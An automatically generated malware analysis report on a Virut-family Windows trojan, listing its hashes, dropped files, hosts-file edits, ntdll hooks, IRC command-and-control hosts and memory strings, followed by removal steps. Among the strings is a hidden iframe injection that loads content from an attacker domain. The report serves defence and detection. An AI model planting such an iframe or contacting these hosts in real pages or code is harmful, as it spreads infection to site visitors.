HEUR:Trojan.Win32.Generic (Kaspersky), Win32.Virtob.Gen.12 (AdAware), VirusVirut.YR (Lavasoft MAS) Behaviour: Trojan, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bfbe90b5af26cb1d2920ae9035f52f78 SHA1: 08863ed2cbb6bbc4e31a0fa2e78df4cd10482430 SHA256: ae60f26d097c2885a6c881ee5d8c2cc3013d659d933f2490e01378001af966e9 SSDeep: 1536:3Y8lYfSccCgwWYaziLoF2N2CFLcVyg6hvQNWq0RuaUkbvWYfsBU5V:3CSccsWlXCFLcVygYvajjkLWEsBU5V Size: 136087 bytes File type: EXE Platform: WIN32 Entropy: Not Packed PEID: UPolyXv05_v6 Company: no certificate found Created at: 2004-09-12 12:55:29 Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).Dynamic Analysis
Payload
No specific payload has been found.Process activity
The Trojan creates the following process(es):ntvdm.exe:848
The Trojan injects its code into the following process(es):%original file name%.exe:644
Mutexes
The following mutexes were created/opened: No objects were found.File activity
The process ntvdm.exe:848 makes changes in the file system.The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (0 bytes)
The Trojan creates and/or writes to the following file(s):
C:\bfbe90b5af26cb1d2920ae9035f52f78.usr (24924 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)
Registry activity
Dropped PE files
MD5 | File path |
---|---|
57958bc87e41b7d12acbd2f1d7339339 | c:\bfbe90b5af26cb1d2920ae9035f52f78.usr |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:127.0.0.1 | jL.chura.pl |
127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
Static Analysis<
VersionInfo
No information is available.PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
4096 | 16384 | 6656 | 5.29942 | ed41050c46cf2dea26cf5a8d78627828 | |
.rsrc | 20480 | 102400 | 102400 | 2.93276 | acbb54ad74dab65240fe19eea951f628 |
petite | 122880 | 379 | 512 | 2.83683 | d9152af36e3787ad41768ba5d11906da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6 b2aab92d99f03af303b25aae13eeb289 a3d3c15c97c2ebb97340bfcedadc7bda bf16c92476d156ca2f2cc1e9d01ae586 bdb67f83e6289ca4eb53f16c6d9d16e6 bad6dd116684e79855f768b0f3dd4102 a487fa44b39cd08de7c7a2df2d4af69eNetwork Activity
URLs
URL | IP |
---|---|
sys.zief.pl | 148.81.111.121 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_644:`.rsrc
D$(PSSh
ccRegVfy.exe
ccApp.exe
IEXPLORE.EXE
windows
\*.exe
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
nddeapir.pdb
_acmdln
m.Zw%
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#%26lt;iframe src="hXXp://jL.c%26#104;ura%26#46;pl/rc/" style="width:1px;height:1px"%26gt;%26lt;/iframe%26gt;
KERNEL32.DLL
windowsupdate
drweb
user32.dll
kernel32.dll
MSVCIRT.dll
MSVCRT.dll
5.1.2600.0 (xpclient.010817-1148)
NDDEAPIR.EXE
Windows
Operating System
5.1.2600.0
\BaseNamedObjects\bcrtVt%original file name%.exe_644_rwx_00401000_00002000:
D$(PSSh%original file name%.exe_644_rwx_00419000_00005000:
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#%26lt;iframe src="hXXp://jL.c%26#104;ura%26#46;pl/rc/" style="width:1px;height:1px"%26gt;%26lt;/iframe%26gt;
KERNEL32.DLL
windowsupdate
drweb
\BaseNamedObjects\bcrtVt
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ntvdm.exe:848
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95B.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsF95C.tmp (269 bytes)
C:\bfbe90b5af26cb1d2920ae9035f52f78.usr (24924 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.